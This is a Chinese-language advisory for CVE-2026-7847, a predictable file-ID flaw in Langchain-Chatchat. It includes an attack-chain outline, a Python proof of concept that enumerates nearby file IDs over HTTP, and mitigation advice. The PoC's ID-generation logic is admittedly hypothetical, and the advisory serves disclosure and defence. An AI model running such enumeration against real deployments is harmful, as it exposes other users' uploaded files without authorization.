CVE-2026-7847: Langchain-Chatchat 文件ID可预测漏洞

漏洞信息

漏洞编号

CVE-2026-7847

漏洞类型

可预测性漏洞

CVSS评分

2.6 低危

攻击向量

邻接 (AV:A)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Langchain-Chatchat

漏洞概述

该漏洞存在于chatchat-space开发的Langchain-Chatchat项目0.3.1.3及更早版本中。问题出在文件上传处理组件的`_get_file_id`函数，该函数未能生成足够随机的值，导致文件ID可被预测。攻击者需处于本地网络并拥有低权限账户，利用高复杂度的攻击手法，通过预测ID访问未授权文件。尽管利用难度较大，但仍存在信息泄露风险，目前官方尚未发布修复补丁。

技术细节

漏洞位于`libs/chatchat-server/chatchat/server/api_server/openai_routes.py`文件的`_get_file_id`函数中。该函数负责生成上传文件的唯一标识符，但由于使用了弱随机算法或逻辑，导致生成的ID缺乏足够的熵值，具有可预测性。攻击者若能接入本地网络并获取低权限账户，可以通过分析少量已知文件ID的时间戳或数值规律，推导出系统生成的其他文件ID。由于CVSS向量显示攻击复杂度高（AC:H），意味着攻击者可能需要精确的时序控制或收集足够多的样本来破解随机算法。一旦预测成功，攻击者无需知道具体文件名，即可直接遍历并下载其他用户上传的敏感文件，造成机密性泄露（C:L）。

攻击链分析

STEP 1

侦察与访问

攻击者接入本地网络，使用低权限账户登录Langchain-Chatchat平台。

STEP 2

样本分析

攻击者上传文件并观察返回的文件ID，或收集系统中现有的文件ID样本。

STEP 3

规律推导

分析收集到的ID样本，利用弱随机算法的特性，推导出ID生成的种子或数学规律。

STEP 4

预测枚举

根据推导出的规律，生成可能存在的文件ID列表，并发起HTTP请求进行验证。

STEP 5

数据窃取

成功命中有效ID后，下载其他用户上传的敏感文件，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import time

# Proof of Concept for CVE-2026-7847: Predictable File ID
# This script demonstrates how an attacker might guess predictable file IDs.
# Note: The actual prediction logic depends on the vulnerable implementation.

TARGET_URL = "http://localhost:8000/v1/files/{}"
# Attacker controls a low-privilege account and uploads a file to observe the ID pattern.

def simulate_weak_random_id(timestamp_seed):
    """
    Simulates a weak random ID generation logic.
    For example, if the ID is based on a predictable timestamp or simple counter.
    """
    # Hypothetical vulnerable logic: ID = timestamp * 1000 + simple counter
    return int(timestamp_seed * 1000)

def exploit():
    print("[*] Starting CVE-2026-7847 PoC...")
    
    # Step 1: Attacker uploads a file and gets 'current_file_id' (e.g., 1715000000000)
    # or observes a known ID from the application.
    known_timestamp = time.time() 
    base_id = simulate_weak_random_id(known_timestamp)
    
    print(f"[*] Observed base file ID pattern around: {base_id}")
    
    # Step 2: Brute force or predict subsequent IDs
    print("[*] Attempting to predict and access adjacent file IDs...")
    
    for offset in range(-100, 100):
        predicted_id = base_id + offset
        url = TARGET_URL.format(predicted_id)
        
        try:
            response = requests.get(url, timeout=5)
            if response.status_code == 200:
                print(f"[+] Successfully accessed file with predicted ID: {predicted_id}")
                # print(f"Content-Type: {response.headers.get('Content-Type')}")
            elif response.status_code == 403:
                print(f"[-] ID {predicted_id} exists but access is forbidden.")
            # Ignore 404s as they are expected for invalid IDs
        except requests.exceptions.RequestException as e:
            print(f"[!] Connection error: {e}")

if __name__ == "__main__":
    exploit()

影响范围

Langchain-Chatchat <= 0.3.1.3

防御指南

临时缓解措施

建议在官方修复前，通过配置防火墙严格限制对文件上传接口的访问源IP。开发者可临时修改代码，引入`uuid4`或`secrets`库来替换现有的随机文件ID生成逻辑，并确保在文件下载接口中增加当前用户与文件归属者的权限校验，防止越权访问。